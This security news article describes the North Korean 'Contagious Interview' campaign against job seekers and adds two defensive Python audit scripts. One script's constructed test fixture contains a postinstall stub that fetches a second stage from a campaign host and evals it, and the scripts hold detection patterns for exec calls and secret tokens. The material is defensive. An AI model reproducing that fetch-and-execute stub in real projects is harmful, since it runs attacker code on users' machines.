North Korean Hackers Target Job Seekers with Fake FreeConference App: Contagious Interview Campaign

North Korean threat actors, known for their sophisticated cyberattacks, have been targeting job seekers with a fake Windows video conferencing application disguised as FreeConference.com.

    North Korean Hackers Leverage Fake Video Conferencing App for Malware Delivery

    North Korean threat actors, known for their sophisticated cyberattacks, have been targeting job seekers with a fake Windows video conferencing application disguised as FreeConference.com. This malicious campaign, dubbed “Contagious Interview,” aims to backdoor developer systems for financial gain.

    Contagious Interview: A Multi-Stage Attack Campaign

    The Contagious Interview campaign, also tracked as DEV#POPPER, is orchestrated by a North Korean threat actor known as Famous Chollima, according to CrowdStrike. The attack chain begins with a fictitious job interview, luring unsuspecting job seekers into downloading and running a Node.js project that contains the BeaverTail downloader malware.

    BeaverTail, in turn, delivers a cross-platform Python backdoor called InvisibleFerret, which grants attackers remote control over the compromised system, enabling them to steal sensitive information such as keystrokes, browser data, and even cryptocurrency wallet data.

    Evolution of the Attack: From MiroTalk to FreeConference

    Initially, the Contagious Interview campaign impersonated the video conferencing software MiroTalk, distributing fake builds as Windows MSI installers and Apple macOS disk image (DMG) files. In July 2024, the threat actors switched to impersonating FreeConference.com instead, copying its branding in a fake installer named “FCCCall.msi.”

    This phony installer is believed to be downloaded from a website named freeconference[.]io, which shares the same registrar as the fictitious mirotalk[.]net website.

    Targeting Job Seekers on Multiple Platforms

    “In addition to LinkedIn, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others,” security researcher Sharmine Low said.

    “After making initial contact, they would often attempt to move the conversation onto Telegram, where they would then ask the potential interviewees to download a video conferencing application, or a Node.js project, to perform a technical task as part of the interview process.”

    Expanding Reach and Targeting Cryptocurrency and Gaming Repositories

    The threat actors have also been observed injecting malicious JavaScript code into both cryptocurrency- and gaming-related repositories. The injected code retrieves the BeaverTail JavaScript from the domains ipcheck[.]cloud or regioncheck[.]net, which shows the actor planting the loader in code that developers clone and run on their own, not only in projects handed over during a staged interview.

    This behavior was also recently highlighted by software supply chain security firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are simultaneously employing different propagation vectors.
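    The two propagation vectors described above, a Node.js "assessment" project handed over during an interview and a trojanized npm dependency, leave the same footprint: a small script, often wired into an npm lifecycle hook, that fetches a second stage from a remote host and runs it. The Python audit script below is an added example, not code from the campaign, CrowdStrike, Phylum or npm. It walks a project tree before `npm install` or `node` is ever run and flags that footprint; the only indicator hostnames it knows are the ones named on this page, and the sample project it scans is constructed for the demo and contains no working malware.

```python
"""Pre-run audit for a Node.js project or an unpacked npm package.

Added example (not code from the campaign, CrowdStrike, Phylum or npm).
It flags the loader footprint described in this write-up: a script wired
into an npm lifecycle hook that fetches a second stage from a remote host
and executes it.  Indicator hostnames are limited to the ones named on
this page; the fixture built by build_sample_project() is constructed
for the demo and contains no working malware.
"""
import json
import re
import tempfile
from pathlib import Path

# Hostnames from the write-up, undefanged so they match real source text.
IOC_HOSTS = {"ipcheck.cloud", "regioncheck.net", "freeconference.io", "mirotalk.net"}

# npm runs these scripts automatically during `npm install`.
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare")

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Network fetch: https.get(...), axios.post(...), fetch(...), XMLHttpRequest
REMOTE_FETCH = re.compile(
    r"\b(?:https?|axios)\s*\.\s*(?:get|request|post)\s*\(|\bfetch\s*\(|\bXMLHttpRequest\b")
# Dynamic execution of data: eval(...), new Function(...), vm.*, child_process
DYNAMIC_EXEC = re.compile(
    r"\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.runIn\w*|\bchild_process\b"
    r"|\b(?:execSync|spawnSync|spawn|exec)\s*\(")
# One base64/hex-looking literal of 300+ chars: a packed payload or obfuscated code.
OPAQUE_BLOB = re.compile(r"[A-Za-z0-9+/=]{300,}")


def scan_js(text, where):
    """Return findings for one JavaScript source file."""
    findings = []
    hosts = {h.lower() for h in URL_HOST.findall(text)}
    for host in sorted(hosts & IOC_HOSTS):
        findings.append({"file": where, "kind": "ioc-host", "detail": host})
    fetch, execm = REMOTE_FETCH.search(text), DYNAMIC_EXEC.search(text)
    # Either alone is common in benign code; both together is the loader shape.
    if fetch and execm:
        findings.append({"file": where, "kind": "fetch-and-exec",
                         "detail": f"{fetch.group(0).strip()} ... {execm.group(0).strip()}"})
    if OPAQUE_BLOB.search(text):
        findings.append({"file": where, "kind": "opaque-blob",
                         "detail": "literal of 300+ base64/hex characters"})
    return findings


def scan_package_json(text, where):
    """Report every script npm would run without the user asking for it."""
    scripts = json.loads(text).get("scripts", {})
    return [{"file": where, "kind": "lifecycle-hook", "detail": f"{hook}: {scripts[hook]}"}
            for hook in AUTO_RUN_HOOKS if hook in scripts]


def audit_project(root):
    """Walk a project tree (node_modules included: a dependency can carry the loader)."""
    root, findings = Path(root), []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.name == "package.json":
            findings += scan_package_json(path.read_text(encoding="utf-8", errors="replace"), rel)
        elif path.suffix in (".js", ".cjs", ".mjs"):
            findings += scan_js(path.read_text(encoding="utf-8", errors="replace"), rel)
    return findings


def build_sample_project(root):
    """Constructed fixture: a benign entry point plus a postinstall loader stub."""
    root = Path(root)
    (root / "lib").mkdir(parents=True, exist_ok=True)
    (root / "package.json").write_text(json.dumps({
        "name": "coding-assessment", "version": "1.0.0",
        "scripts": {"start": "node index.js", "postinstall": "node lib/errors.js"},
    }), encoding="utf-8")
    (root / "index.js").write_text(
        "const express = require('express');\nmodule.exports = express();\n", encoding="utf-8")
    (root / "lib" / "errors.js").write_text(
        "// constructed stub of the loader shape: fetch a second stage, then eval it\n"
        "const https = require('https');\n"
        "https.get('https://ipcheck.cloud/stage2.js', r => {\n"
        "  let body = ''; r.on('data', d => body += d); r.on('end', () => eval(body));\n"
        "});\n", encoding="utf-8")
    return root


def demo():
    """Build the fixture in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_project(build_sample_project(tmp))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['kind']:15} {f['file']:18} {f['detail']}")
```

    Run it as `python audit.py` to see the fixture's three findings; point audit_project() at a freshly cloned project to check it. A lifecycle hook is not malicious by itself, but a hook that points at a file which both fetches from the network and evaluates the result is exactly the shape described above and is worth reading in full before anything in the project is executed.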

    BeaverTail’s Enhanced Capabilities: Stealing Cryptocurrency Data and Establishing Persistence

    BeaverTail has been upgraded to extract data from more cryptocurrency wallet extensions, including Kaikas, Rabby, Argent X, and Exodus Web3. It also implements functionality to establish persistence using AnyDesk, a remote desktop software.

    CivetQ: A Modularized Information Stealing Tool

    BeaverTail’s information-stealing features are now implemented as a set of Python scripts collectively called CivetQ. This modularized tool can harvest cookies, web browser data, keystrokes, and clipboard content, and can fetch and run additional scripts. It targets a total of 74 browser extensions.

    “The malware is able to steal data from Microsoft Sticky Notes by targeting the application’s SQLite database files located at %LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite, where user notes are stored in an unencrypted format,” Low said. “By querying and extracting data from this database, the malware can retrieve and exfiltrate sensitive information from the victim’s Sticky Notes application.”
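    Anything in that plum.sqlite file is readable by any process running as the logged-in user, so the practical defense is to keep secrets out of it. The Python self-audit below is an added example, not code from the article, the malware or Microsoft. It opens such a database read-only and lists the notes that look like credentials, API keys or wallet recovery phrases; it assumes only a Note table with Id and Text columns and an optional '\id=<guid>' marker at the start of the text, and demo() runs it against a constructed copy with that minimal schema rather than the live file.

```python
"""Self-audit of a Sticky Notes database for secrets that should not be there.

Added example, not code from the article, the malware or Microsoft.  Any
process running as the logged-in user can read plum.sqlite, so the useful
defense is to find and move out the notes an infostealer would want.
Assumptions: the notes live in a table named Note with Id and Text
columns, and Text may carry a leading '\\id=<guid>' marker; the database
opened by demo() is a constructed copy with that minimal schema.
"""
import os
import re
import sqlite3
import tempfile
from pathlib import Path

# Path quoted in the write-up; os.path.expandvars resolves %LocalAppData% only on Windows.
STICKY_NOTES_DB = (r"%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe"
                   r"\LocalState\plum.sqlite")

ID_PREFIX = re.compile(r"^\\id=[0-9a-fA-F-]{36}\s*")          # assumed note-text marker
KEYWORD = re.compile(r"\b(?:password|passwd|pwd|passphrase|seed phrase|recovery phrase"
                     r"|private key|2fa|backup code)s?\b", re.I)
TOKEN = re.compile(r"\b(?:AKIA[0-9A-Z]{16}"                    # AWS access key id
                   r"|sk_(?:live|test)_[0-9A-Za-z]{16,}"        # Stripe secret key
                   r"|ghp_[0-9A-Za-z]{36}"                      # GitHub PAT
                   r"|0x[0-9a-fA-F]{64}"                        # raw 256-bit hex key
                   r"|[A-Za-z0-9_\-]{40,})\b")                   # any long opaque token


def classify(text):
    """Reasons a note looks sensitive; an empty list means it looks harmless."""
    body = ID_PREFIX.sub("", text).strip()
    reasons = []
    if KEYWORD.search(body):
        reasons.append("secret keyword")
    if TOKEN.search(body):
        reasons.append("token-like string")
    words = body.lower().split()
    # BIP-39 wallet recovery phrases are exactly 12 or 24 plain lowercase words.
    if len(words) in (12, 24) and all(w.isalpha() for w in words):
        reasons.append("possible wallet mnemonic")
    return reasons


def find_sensitive_notes(db_path):
    """Return [(note_id, reasons)] for every note that trips a heuristic."""
    uri = Path(db_path).resolve().as_uri() + "?mode=ro"   # read-only: never touch the user's notes
    con = sqlite3.connect(uri, uri=True)
    try:
        rows = con.execute("SELECT Id, Text FROM Note ORDER BY Id").fetchall()
    finally:
        con.close()
    return [(note_id, r) for note_id, text in rows if (r := classify(text or ""))]


def build_sample_db(path):
    """Constructed fixture with the minimal schema assumed above."""
    con = sqlite3.connect(path)
    with con:
        con.execute("CREATE TABLE Note (Id TEXT PRIMARY KEY, Text TEXT)")
        con.executemany("INSERT INTO Note VALUES (?, ?)", [
            ("n1", "\\id=1b7e7f0a-2f3c-4f6a-9c4e-1a2b3c4d5e6f Buy milk and call the dentist"),
            ("n2", "\\id=2c8f8a1b-3e4d-4a7b-8d5f-2b3c4d5e6f70 wifi password: hunter2"),
            ("n3", "\\id=3d9a9b2c-4f5e-4b8c-9e6a-3c4d5e6f7081 aws root AKIAIOSFODNN7EXAMPLE"),
            ("n4", "abandon ability able about above absent absorb abstract absurd abuse access accident"),
        ])
    con.close()
    return path


def demo():
    """Build the fixture in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_sensitive_notes(build_sample_db(os.path.join(tmp, "plum.sqlite")))


if __name__ == "__main__":
    target = os.path.expandvars(STICKY_NOTES_DB)
    hits = find_sensitive_notes(target) if os.path.exists(target) else demo()
    for note_id, reasons in hits:
        print(note_id, ", ".join(reasons))
```

    On a Windows machine the script audits the real database if it exists, otherwise it falls back to the constructed copy. The heuristics are deliberately loose; the point is to surface notes worth moving into a password manager, since an infostealer with the same user privileges needs nothing more than the query above to read all of them.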

    Lazarus Group’s Evolving Tactics and Increased Creativity

    The emergence of CivetQ highlights the modularized approach and constant evolution of the tools used by the Lazarus Group.

    “Lazarus has updated their tactics, upgraded their tools, and found better ways to conceal their activities,” Low said. “They show no signs of easing their efforts, with their campaign targeting job seekers extending into 2024 and to the present day. Their attacks have become increasingly creative, and they are now expanding their reach across more platforms.”

    FBI Warning: North Korean Hackers Targeting Cryptocurrency Industry

    The disclosure of the Contagious Interview campaign coincides with a warning from the U.S. Federal Bureau of Investigation (FBI) about North Korean cyber actors aggressively targeting the cryptocurrency industry. The FBI states that these actors use sophisticated social engineering attacks to facilitate cryptocurrency theft.

    “North Korean social engineering schemes are complex and elaborate, often compromising victims with sophisticated technical acumen,” the FBI said in an advisory.

    “Teams of North Korean malicious cyber actors identify specific DeFi or cryptocurrency-related businesses to target and attempt to socially engineer dozens of these companies’ employees to gain unauthorized access to the company’s network.”

    Protecting Yourself from Contagious Interview and Similar Attacks

    The Contagious Interview campaign highlights the importance of staying vigilant against social engineering attacks, especially when applying for jobs or engaging in online interactions. Here are some tips for protecting yourself:

    • Be wary of unsolicited job offers: If a recruiter contacts you out of the blue, verify the company and the role through its official website and a contact you find independently, not through the details the recruiter supplies.
    • Avoid downloading software from untrusted sources: Download only from the vendor’s real domain or a reputable app store, and compare the domain character by character (freeconference.com, not freeconference[.]io).
    • Be cautious of requests to run software during job interviews: A legitimate assessment does not require you to install a conferencing client or execute an unreviewed Node.js project on your own machine. If you must run it, read its package.json scripts first and run it in a disposable virtual machine with no wallets, browser profiles, or credentials on it.
    • Use strong passwords and multi-factor authentication: Protect your accounts with unique passwords in a password manager and enable multi-factor authentication wherever possible, and keep wallet seed phrases and passwords out of plaintext notes such as Sticky Notes.
    • Keep your software up-to-date: Regularly update your operating system and applications to patch vulnerabilities that could be exploited by attackers, and review installed remote-access tools such as AnyDesk that you did not set up yourself.

    The Contagious Interview campaign demonstrates the evolving tactics of North Korean threat actors and the importance of staying informed about the latest threats. Following these steps reduces the chance of becoming a victim of these attacks, and of handing over access to a wallet or an employer’s network in the process.
